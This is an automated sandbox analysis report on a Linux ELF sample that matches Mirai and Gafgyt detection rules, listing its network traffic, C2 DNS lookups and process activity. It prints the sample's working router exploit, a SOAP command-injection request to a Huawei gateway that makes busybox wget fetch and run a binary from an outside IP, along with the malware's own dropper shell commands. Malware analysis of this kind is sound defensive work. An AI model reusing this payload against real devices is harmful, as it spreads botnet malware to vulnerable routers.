          Source: unknownTCP traffic detected without corresponding DNS query: 197.8.63.16
          Source: unknownTCP traffic detected without corresponding DNS query: 132.111.249.4
          Source: unknownTCP traffic detected without corresponding DNS query: 197.32.54.151
          Source: unknownTCP traffic detected without corresponding DNS query: 69.175.58.192
          Source: unknownTCP traffic detected without corresponding DNS query: 185.247.192.134
          Source: unknownTCP traffic detected without corresponding DNS query: 41.17.139.34
          Source: unknownTCP traffic detected without corresponding DNS query: 184.200.42.7
          Source: unknownTCP traffic detected without corresponding DNS query: 157.143.186.196
          Source: unknownTCP traffic detected without corresponding DNS query: 197.162.212.232
          Source: unknownTCP traffic detected without corresponding DNS query: 157.226.249.173
          Source: unknownTCP traffic detected without corresponding DNS query: 41.204.245.74
          Source: unknownTCP traffic detected without corresponding DNS query: 41.204.127.28
          Source: unknownTCP traffic detected without corresponding DNS query: 41.68.219.4
          Source: unknownTCP traffic detected without corresponding DNS query: 197.162.131.20
          Source: unknownTCP traffic detected without corresponding DNS query: 167.130.212.255
          Source: unknownTCP traffic detected without corresponding DNS query: 143.207.8.71
          Source: unknownTCP traffic detected without corresponding DNS query: 157.215.34.222
          Source: unknownTCP traffic detected without corresponding DNS query: 219.76.204.174
          Source: unknownTCP traffic detected without corresponding DNS query: 157.189.119.55
          Source: unknownTCP traffic detected without corresponding DNS query: 41.59.192.2
          Source: unknownTCP traffic detected without corresponding DNS query: 197.117.162.83
          Source: unknownTCP traffic detected without corresponding DNS query: 43.179.170.100
          Source: unknownTCP traffic detected without corresponding DNS query: 41.19.49.16
          Source: unknownTCP traffic detected without corresponding DNS query: 50.189.204.48
          Source: unknownTCP traffic detected without corresponding DNS query: 157.46.249.106
          Source: unknownTCP traffic detected without corresponding DNS query: 41.128.130.208
          Source: unknownTCP traffic detected without corresponding DNS query: 142.0.83.204
          Source: unknownTCP traffic detected without corresponding DNS query: 197.223.83.218
          Source: unknownTCP traffic detected without corresponding DNS query: 71.250.85.3
          Source: unknownTCP traffic detected without corresponding DNS query: 197.28.70.32
          Source: unknownTCP traffic detected without corresponding DNS query: 41.177.52.245
          Source: XHZFo8hExw.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: XHZFo8hExw.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknownDNS traffic detected: queries for: kamuiv3.hopto.org

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: Process Memory Space: XHZFo8hExw.elf PID: 6226, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: XHZFo8hExw.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: Process Memory Space: XHZFo8hExw.elf PID: 6226, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sampleString containing 'busybox' found: Content-Length: /bin/busybox/bin/watchdog/bin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
          Source: classification engineClassification label: mal96.troj.linELF@0/0@1/0

          Persistence and Installation Behavior

          barindex
          Sets full permissions to files and/or directories
          Source: /bin/sh (PID: 6230)Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/watchdog
          Source: /bin/sh (PID: 6229)Mkdir executable: /usr/bin/mkdir -> mkdir bin
          Source: /bin/sh (PID: 6230)Chmod executable: /usr/bin/chmod -> chmod 777 bin/watchdog
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/6233/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1582/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/3088/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/230/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/110/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/231/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/111/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/232/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1579/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/112/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/233/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1699/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/113/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/234/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1335/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1698/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/114/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/235/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1334/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1576/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/2302/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/115/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/236/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/116/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/237/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/117/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/118/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/910/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/119/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/912/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/10/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/2307/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/11/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/918/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/12/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/13/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/14/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/15/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/16/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/17/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/18/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1594/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/120/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/121/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1349/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/122/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/243/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/123/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/2/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/124/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/3/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/4/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/125/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/126/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1344/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1465/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1586/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/127/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/6/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/248/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/128/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/249/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1463/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/800/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/9/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/801/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/20/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/21/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1900/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/22/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/23/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/24/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/25/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/26/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/27/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/28/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/29/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/491/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/250/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/130/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/251/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/252/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/132/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/253/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/254/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/255/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/256/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1599/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/257/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1477/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/379/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/258/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1476/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/259/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1475/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/936/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/30/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/2208/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/35/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1809/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/1494/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/260/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/261/cmdline
          Source: /tmp/XHZFo8hExw.elf (PID: 6232)File opened: /proc/141/cmdline
          Source: /usr/bin/chmod (PID: 6230)File: /tmp/bin/watchdog (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
          Source: /tmp/XHZFo8hExw.elf (PID: 6227)Shell command executed: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv */tmp/XHZFo8hExw.elf <\\xc0\\xbc\\xff\\x84\\x83\\x86\tbin/watchdog; chmod 777 bin/watchdog"
          Source: /bin/sh (PID: 6228)Rm executable: /usr/bin/rm -> rm -rf bin/watchdog
          Source: submitted sampleStderr: sh: 1: cannot open : No such file: exit code = 0

          Hooking and other Techniques for Hiding and Protection

          barindex
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 46574 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39574 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39574
          Source: unknownNetwork traffic detected: HTTP traffic on port 44976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 44976
          Source: unknownNetwork traffic detected: HTTP traffic on port 39570 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40986 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40988 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 40986
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 40986
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 40988
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 40988
          Source: unknownNetwork traffic detected: HTTP traffic on port 56256 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39590 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39590
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
